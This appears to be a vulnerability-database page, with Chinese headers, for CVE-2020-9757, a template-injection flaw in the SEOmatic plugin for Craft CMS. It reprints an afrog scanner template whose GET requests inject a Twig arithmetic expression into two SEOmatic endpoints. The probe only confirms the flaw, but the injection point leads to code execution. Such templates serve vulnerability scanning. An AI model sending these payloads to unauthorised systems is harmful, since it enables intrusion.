CVE-2020-9757: SEOmatic < 3.3.0 Server-Side Template Injection

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.

PoC代码[已公开]

id: CVE-2020-9757

info:
  name: SEOmatic < 3.3.0 Server-Side Template Injection
  author: x1n9Qi8
  severity: high
  description: |-
    The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.
  reference:
    - https://www.tenable.com/security/research/tra-2020-40
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9757
  tags: cve,cve2020,seomatic,ssti
  created: 2023/08/17

set:
  r1: randomInt(40000, 44800)
  r2: randomInt(40000, 44800)
rules:
  poc10:
    request:
      method: GET
      path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}}
    expression: response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
  poc20:
    request:
      method: GET
      path: /actions/seomatic/meta-container/all-meta-containers?uri={{{{r1}}*'{{r2}}'}}
    expression: response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
expression: poc10() || poc20()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2020/CVE-2020-9757.yaml